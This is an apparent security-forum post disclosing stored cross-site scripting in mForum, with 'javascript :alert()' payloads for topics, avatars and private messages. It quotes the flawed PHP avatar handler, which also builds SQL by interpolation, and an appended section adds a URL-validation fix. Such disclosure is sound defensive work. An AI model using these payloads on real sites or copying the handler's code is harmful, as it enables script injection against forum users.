
10.12.2009, 21:14
Moderator - Level 7
Registered: 19.12.2008
Posts: 1,203
mForum
Active (stored) XSS:
1. Create a topic with [IMG]javascript :alert()[/IMG]
2. usercp.php?mode=edit_profile : Image link = javascript :alert()
PHP code:
if ($_POST[avatar2] != "" AND $_POST[deleteavatar] == "") {
    #THIRDIF#
    $len = strlen($_POST[avatar2]) - 4;
    $check_ext = substr($_POST[avatar2],$len,strlen($_POST[avatar2]));
    if ($check_ext != ".gif" AND $check_ext != ".jpg")
        profile_error("$lang[138]");
    $_POST[avatar2] = str_replace(">", "", $_POST[avatar2]);
    $_POST[avatar2] = str_replace("<", "", $_POST[avatar2]);
    $_POST[avatar2] = str_replace("\"", "", $_POST[avatar2]);
    if (strlen($_POST[avatar2]) > 200 OR strlen($_POST[avatar2]) < 7)
        profile_error("$lang[140]");
    $query_av = "UPDATE $table_users SET avatar=\"$_POST[avatar2]\" WHERE id=\"$_SESSION[user_id]\" LIMIT 1";
    if (mysql_query($query_av,$db))
        print "<li>$lang[141]</li>";
    #THIRDIF#
}
3. post.php?mode=pvt [IMG]javascript :alert()[/IMG]
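An added example, not part of the original post and not mForum code: the avatar check quoted above only compares the last four characters and strips `<`, `>` and `"`, so the URL scheme is never validated. The sketch below shows one way to validate an image URL for the avatar field and for [IMG] tags; the function names `is_safe_image_url` and `render_image` and the sample inputs are hypothetical.

```php
<?php
// Hypothetical helper (not mForum code): decide whether a user-supplied
// image URL may be stored and later rendered inside an <img> tag.
function is_safe_image_url(string $url): bool
{
    // Length limits taken from the quoted check (7..200 characters).
    if (strlen($url) < 7 || strlen($url) > 200) {
        return false;
    }
    // Reject whitespace and control characters anywhere in the value:
    // browsers drop tabs and newlines inside URLs, which defeats
    // naive string comparisons against "javascript:".
    if (preg_match('/[\x00-\x20\x7f]/', $url)) {
        return false;
    }
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'], $parts['path'])) {
        return false;
    }
    // Allowlist the scheme instead of trying to blocklist dangerous ones.
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false;
    }
    // Check the extension of the path component only, so a query string
    // ending in ".gif" cannot satisfy the test.
    $ext = strtolower(pathinfo($parts['path'], PATHINFO_EXTENSION));
    return in_array($ext, ['gif', 'jpg'], true);
}

// Hypothetical renderer: encode on output even after validation.
function render_image(string $url): string
{
    if (!is_safe_image_url($url)) {
        return '';
    }
    return '<img src="' . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . '" alt="">';
}

// Constructed sample inputs.
$samples = [
    'http://example.com/avatar.gif',        // accept
    'javascript:alert()//.gif',             // reject: scheme not allowlisted, no host
    'http://example.com/x.php?f=a.gif',     // reject: path extension is php
    "http://example.com/a\t.jpg",           // reject: control character
];
foreach ($samples as $s) {
    printf("%-40s %s\n", json_encode($s), is_safe_image_url($s) ? 'accept' : 'reject');
}
```

The same validation applies wherever the URL is consumed (topic posts, private messages, profile), and the value written to the database should go through a parameterized query rather than string interpolation.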